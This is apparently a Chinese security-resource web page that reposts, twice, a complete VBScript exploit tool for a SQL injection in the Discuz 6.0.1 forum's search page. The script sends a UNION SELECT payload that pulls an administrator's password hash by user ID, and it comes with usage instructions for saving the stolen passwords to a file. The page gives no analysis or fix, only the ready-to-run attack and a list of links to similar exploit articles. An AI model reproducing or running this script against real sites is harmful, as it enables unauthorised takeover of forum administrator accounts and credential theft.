您现在的位置是:网站首页> 编程资料编程资料
discuz获取任意管理员密码漏洞利用工具vbs版_漏洞分析_网络安全_
2023-05-24
323人已围观
简介 discuz获取任意管理员密码漏洞利用工具vbs版_漏洞分析_网络安全_
以下是search.inc.php 文件漏洞利用代码VBS版
Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
获得的密码大家自己在result.txt中查找
复制代码
代码如下:Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
获得的密码大家自己在result.txt中查找
相关内容
- JSP 修改文件时间的WEBSHELL_漏洞分析_网络安全_
- Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法_漏洞分析_网络安全_
- 利用XSS渗透DISCUZ 6.1.0实战_漏洞分析_网络安全_
- 浅析 LxBlog V6 变量未初始化漏洞_漏洞分析_网络安全_
- ECShop 注射漏洞分析_漏洞分析_网络安全_
- Discuz! wap功能模块编码的注射漏洞_漏洞分析_网络安全_
- 战略战争游戏DropTeam多个远程安全漏洞 _漏洞分析_网络安全_
- Nagios插件超长位置头远程缓冲区溢出漏洞 _漏洞分析_网络安全_
- Level-One WBR-3460A 无线路由器非授权访问漏洞 _漏洞分析_网络安全_
- Unix主机安全漏洞分析 _漏洞分析_网络安全_
